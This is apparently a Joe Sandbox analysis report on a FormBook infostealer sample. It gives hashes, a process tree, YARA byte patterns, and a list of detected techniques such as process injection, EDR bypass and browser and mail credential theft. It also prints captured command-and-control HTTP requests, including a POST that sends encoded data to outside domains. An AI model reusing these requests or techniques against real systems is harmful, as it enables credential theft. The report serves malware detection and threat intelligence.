Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CMV610942X6UI.exe

Overview

General Information

Sample name:CMV610942X6UI.exe
Analysis ID:1467082
MD5:c9dd16ae393fc240bcf80fda156e7f1a
SHA1:9f73e0a2fe75f46e68cef5fd57f54c410004dd1e
SHA256:48d19b1644c9d67726df35e5ca07970db83813e981ec75a0eaa89960d8b5d020
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CMV610942X6UI.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\CMV610942X6UI.exe" MD5: C9DD16AE393FC240BCF80FDA156E7F1A)
    • CMV610942X6UI.exe (PID: 8120 cmdline: "C:\Users\user\Desktop\CMV610942X6UI.exe" MD5: C9DD16AE393FC240BCF80FDA156E7F1A)
      • ZkqZZBQxQqm.exe (PID: 2328 cmdline: "C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systray.exe (PID: 5240 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • ZkqZZBQxQqm.exe (PID: 5056 cmdline: "C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1036 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a420:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13b2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2d763:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.CMV610942X6UI.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.CMV610942X6UI.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d763:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.CMV610942X6UI.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.CMV610942X6UI.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2c963:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.tutoringservices-jp.space/7kq8/Avira URL Cloud: Label: phishing
            Source: http://www.tutoringservices-jp.space/7kq8/?Efup=gtM5/A+y2ZoJWEDfDaE+2w6kJ8M6pgUfoEVlPe5CjlMa7apflPEeb4hE3FwUuugxFTbEVrAuO+b6prDKuBbSe95OhQpk0L9IAVb1ZHk0JEw5+OIIQunEo+vX5ya5UUiI4w==&5X=Wrl4wnYPAvira URL Cloud: Label: phishing
            Multi AV Scanner detection for submitted file
            Source: CMV610942X6UI.exeReversingLabs: Detection: 31%
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.CMV610942X6UI.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.CMV610942X6UI.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3262194448.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1789862257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3262116484.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1790265405.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1791374700.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3261985504.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: CMV610942X6UI.exeJoe Sandbox ML: detected
            Source: CMV610942X6UI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: CMV610942X6UI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: systray.pdb source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261143467.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sxkr.pdbSHA256M source: CMV610942X6UI.exe
            Source: Binary string: systray.pdbGCTL source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, ZkqZZBQxQqm.exe, 00000007.00000002.3261143467.0000000000F18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sxkr.pdb source: CMV610942X6UI.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZkqZZBQxQqm.exe, 00000007.00000000.1716110923.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmp, ZkqZZBQxQqm.exe, 00000009.00000000.1858183726.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: CMV610942X6UI.exe, 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1791760271.0000000005025000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1790150372.0000000004E7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CMV610942X6UI.exe, CMV610942X6UI.exe, 00000003.00000002.1790525561.0000000000F40000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1791760271.0000000005025000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000008.00000003.1790150372.0000000004E7B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0324B7F0 FindFirstFileW,FindNextFileW,FindClose,8_2_0324B7F0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then xor eax, eax8_2_03239640
            Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi8_2_0323DB5B
            Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then mov ebx, 00000004h8_2_04FC053E
            Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
            Source: Joe Sandbox ViewIP Address: 203.161.62.199 203.161.62.199
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /bakr/?Efup=XDoTgsrtu8W4rBGfVFPBe+VTMhp4aj1fDDoEglHaJ5OOwDCoRETt6EMOwV71ZOd09KZu8+ugWGfmhcxQhERPkTRicN45Uigraquu8zuJ3nqxw5c62M4XByCrclFahX0wxg==&5X=Wrl4wnYP HTTP/1.1Host: www.thirstythursdaywines.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYP HTTP/1.1Host: www.aotuqiye.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /w7zx/?Efup=4nFzxviigBNCR0XnJkvhNhUb0o3qDKAKJVt5c0EBpnWfgFZ7hCzAhg6W/oCSYblqABe344EIzDMItVaOjGR7QKZXmGlK5CURSd3zTznCfgDClaltbyP35QucHh8Re5qnMA==&5X=Wrl4wnYP HTTP/1.1Host: www.marinestoreng.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /d5d3/?Efup=XQbeRjD/PDdWBh12NU+ykUl2F4dvHc6VXEhqzGSjB3wJSjcs0xwI8Icac1G5+8QpiM7OSYRY7+DwwJfqawKXGWKHnDunR+LM5fl2Yw480JpoJUWygYqvECbW/AkZxLcv1w==&5X=Wrl4wnYP HTTP/1.1Host: www.zethcraft.infoAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiXOWq2hFnbSrpYq5tfQM8qwnGlhpBH7wUMA2rqYfQo8R+3WIcA6o0TPRBDA7dTlRc+xV9X/9AN+Ulg==&5X=Wrl4wnYP HTTP/1.1Host: www.herplaatsingscoach.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYP HTTP/1.1Host: www.aotuqiye.comAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /7kq8/?Efup=gtM5/A+y2ZoJWEDfDaE+2w6kJ8M6pgUfoEVlPe5CjlMa7apflPEeb4hE3FwUuugxFTbEVrAuO+b6prDKuBbSe95OhQpk0L9IAVb1ZHk0JEw5+OIIQunEo+vX5ya5UUiI4w==&5X=Wrl4wnYP HTTP/1.1Host: www.tutoringservices-jp.spaceAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /9tym/?Efup=0S/ZPq6i4295YU31CGsIF3+6CX49wr8UBlIPMbX3EHvT6GYfIlkKvIaQUZZ23gNfBRY92LbOf61zdN1D+KaxZKPZCNQTzZg2JqvKwBvhTNR6FU45NnpKZwAnu57SnFRcaQ==&5X=Wrl4wnYP HTTP/1.1Host: www.mommysdaycare.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /siy1/?Efup=K3jVd2QwvP/vE5bLqRwLiG/ouCi2dCf8HcrsXZX+iIcvtfjJNCMaZ4cNZ/78hy4DUFhEXV0DZOcTULe6zQ1rJbzjmaVovzYps5hxNWqkCnG6IikFfqhaq5tMJN6I5yDLJQ==&5X=Wrl4wnYP HTTP/1.1Host: www.kwytruband.cloudAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.thirstythursdaywines.com
            Source: global trafficDNS traffic detected: DNS query: www.aotuqiye.com
            Source: global trafficDNS traffic detected: DNS query: www.marinestoreng.com
            Source: global trafficDNS traffic detected: DNS query: www.zethcraft.info
            Source: global trafficDNS traffic detected: DNS query: www.herplaatsingscoach.com
            Source: global trafficDNS traffic detected: DNS query: www.tapnly.online
            Source: global trafficDNS traffic detected: DNS query: www.tutoringservices-jp.space
            Source: global trafficDNS traffic detected: DNS query: www.mommysdaycare.net
            Source: global trafficDNS traffic detected: DNS query: www.kwytruband.cloud
            Source: unknownHTTP traffic detected: POST /kyls/ HTTP/1.1Host: www.aotuqiye.comAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.aotuqiye.comConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 205Referer: http://www.aotuqiye.com/kyls/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 45 66 75 70 3d 6d 44 43 6b 6e 69 77 63 46 38 62 53 79 30 6b 4d 77 6a 4e 42 43 50 59 2b 6b 76 68 6a 38 55 76 65 6e 41 72 37 54 66 2b 59 67 35 56 38 67 48 67 6c 41 33 52 6b 48 55 45 6d 46 6e 58 38 65 6b 68 43 43 69 67 7a 4e 73 47 48 6c 58 50 37 30 63 63 55 75 69 50 6d 34 49 39 42 37 41 32 38 67 72 73 34 70 56 72 69 75 47 2f 51 4e 6b 71 45 72 4b 69 36 36 73 77 35 73 71 72 6b 42 6f 58 4c 6d 55 7a 31 36 65 66 4a 48 63 32 4b 76 71 39 4d 41 64 34 57 4e 38 2b 44 72 35 6e 4f 66 6b 68 69 65 66 2b 41 32 38 6f 4e 41 6e 37 68 61 7a 4f 4e 74 6c 51 69 65 51 33 4f 52 67 7a 65 61 70 2b 41 61 4a 61 45 6d 39 77 69 72 73 51 3d Data Ascii: Efup=mDCkniwcF8bSy0kMwjNBCPY+kvhj8UvenAr7Tf+Yg5V8gHglA3RkHUEmFnX8ekhCCigzNsGHlXP70ccUuiPm4I9B7A28grs4pVriuG/QNkqErKi66sw5sqrkBoXLmUz16efJHc2Kvq9MAd4WN8+Dr5nOfkhief+A28oNAn7hazONtlQieQ3ORgzeap+AaJaEm9wirsQ=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:15 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 7a 68 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 69 67 68 74 20 64 61 72 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 0d 0a 20 20 20 20 20 20 20 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 37 20 54 68 65 20 43 68 72 6f 6d 69 75 6d 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 2a 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 20 2a 2f 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 29 3b 20 7d 20 62 6f 64 79 20 7b 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 2d 2d 65 72 72 6f 72 2d 63 6f 64 65 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 37 30 30 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 31 30 30 3a 20 72 67 62 28 32 31 30 2c 20 32 32 37 2c 20 32 35 32 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 33 30 30 3a 20 72 67 62 28 31 33 38 2c 20 31 38 30 2c 20 32 34 38 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 36 30 30 3a 20 72 67 62 28 32 36 2c 20 31 31 35 2c 20 32 33 32 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 37 30 30 3a 20 72 67 62 28 32 35 2c 20 31 30 33 2c 20 32 31 30 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 31 30 30 3a 20 72 67 62 28 32 34 31 2c 20 32 34 33 2c 20 32 34 34 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 33 30 30 3a 20 72 67 62 28 32 31 38 2c 20 32 32 30 2c 20 32 32 34 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 35 30 30 3a 20 72 67 62 28 31 35 34 2c 20 31 36 30 2c 20 31 36 36 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 35 30 3a 20 72 67 62 28 32 34
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:31 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13dVTfHYnF%2B54q10zl9jO2Hbalyann%2BSEIptouMuDsopV85s%2BzfodXDb%2FWrbx3sKhgNSztsRgpkF0Kxq%2FZO4CTs7vDdSRKppgo8RNSsDMGQFATKrgOmTrEy7Bwq1lxbxNUSQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81b28fb0a4285-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:34 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuj47DiGHxRi23bvBISW0hBjFmGEzBagfIUmtPZZdghxW7dHQ1CRURzk0EtmASkPcHCYT6jlcqqKKBtl1TL9KOCR7ECmRye8ICrz0ZnHUs9hclkg8lwn09OBFiXRqC0QP3Ym"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81b38dd170f75-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:36 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LSb7t4%2BRSr00bHcHijycoU%2FLm1BlbPvXGLX6WgYQjSeIFxwpIZ9DKDGANCgirGGlDqNAdvguoI%2B1uGwwJ%2BveEQO%2F1tDhHEZ%2BiT%2FIKFnuKBbimTzcmc35DTV4UeC4JDKKFuG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81b487b9f7c99-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:39 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlzKg4fMkjUhVuW%2B7L9njtXQLEF5vUd42OM%2FBOCvnZ8WAx4Xg9etZEK9O9tYdjfgi6vVbvDtu48cbL5JFhSxVLunPJaUBRDtyj8mI2oq3kIvpga6vAAK7DHn35bsUReLHH35"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d81b585a6341df-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:03:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 